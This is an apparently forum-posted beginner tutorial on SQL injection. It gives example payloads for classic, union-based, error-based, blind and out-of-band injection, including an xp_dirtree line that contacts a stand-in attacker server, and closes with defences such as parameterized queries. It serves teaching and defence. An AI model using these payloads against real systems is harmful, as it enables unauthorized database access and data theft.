Topic - SQL Injection & Defence

SQL Injection & Defence

SQL Injection & Defence : A Step-by-Step Guide for Beginners"

Tutorial Content

🚀 What is SQL Injection?
SQL Injection (SQLi) is a web hacking technique that allows attackers to manipulate a web application's database by injecting malicious SQL queries. This can lead to unauthorized access to sensitive data, such as usernames, passwords, and more.

📌 Types of SQL Injection

1. Classic SQL Injection

2. Union-Based SQL Injection

3. Error-Based SQL Injection

4. Blind SQL Injection

Boolean-Based

Time-Based

5. Out-of-Band SQL Injection

---

🔍 1. Classic SQL Injection

This occurs when malicious SQL queries are injected through user inputs.

Example: Login Form

Query executed by the application:

SELECT * FROM users WHERE username = 'admin' AND password = 'password';

Injected Input:

' OR '1'='1

Resulting Query:

SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '';

Impact:
The condition OR '1'='1' always evaluates to true, granting access without credentials.

---

🔍 2. Union-Based SQL Injection

This method exploits the SQL UNION operator to combine results from two or more SELECT statements.

Example: Exploiting a Search Field

Query executed by the application:

SELECT name, email FROM users WHERE id = '1';

Injected Input:

1 UNION SELECT username, password FROM admin--

Resulting Query:

SELECT name, email FROM users WHERE id = '1' UNION SELECT username, password FROM admin;

Impact:
This fetches results from both users and admin tables.

---

🔍 3. Error-Based SQL Injection

This technique forces the database to generate error messages that reveal valuable information.

Example: Finding Column Count

Input:

1 ORDER BY 5--

If an error is returned, it indicates that the table has fewer than 5 columns. The attacker adjusts the number until no error is shown, revealing the column count.

---

🔍 4. Blind SQL Injection

Boolean-Based Blind SQL Injection

Exploits logical statements to infer true or false conditions.

Example:

1' AND 1=1--

(Condition evaluates to true, data is displayed)

1' AND 1=2--

(Condition evaluates to false, no data is displayed)

Time-Based Blind SQL Injection

Uses SQL commands like SLEEP() to delay responses.

Example:

1' AND IF(1=1, SLEEP(5), 0)--

Impact:
If the page takes 5 seconds to load, the condition was true.

---

🔍 5. Out-of-Band SQL Injection

This technique uses external systems (e.g., DNS or HTTP requests) to extract data.

Example: DNS Exfiltration

Injected Payload:

1; EXEC master..xp_dirtree '\\attacker-server.com\payload'--

Impact:
The database server connects to the attacker’s server, revealing the vulnerability.

---

💡 How to Practice Safely

Use intentionally vulnerable applications like:

DVWA (Damn Vulnerable Web Application)

bWAPP (Buggy Web Application)

HackTheBox

🛡️ Defense Techniques

1. Parameterized Queries:
Replace raw SQL queries with prepared statements.
Example in Python:

cursor.execute("SELECT * FROM users WHERE username = ? AND password = ?", (username, password))

2. Input Validation:

Sanitize user inputs.

Use whitelisting techniques.

3. Database Configuration:

Restrict permissions.

Disable verbose error messages.

4. WAF (Web Application Firewall):
Use firewalls to block malicious traffic.

#bugbountytips #SQL #bugbountytip #cybersecurity @topfans

Subsection: IT Knowledge
Section: Student Zone

Topic Files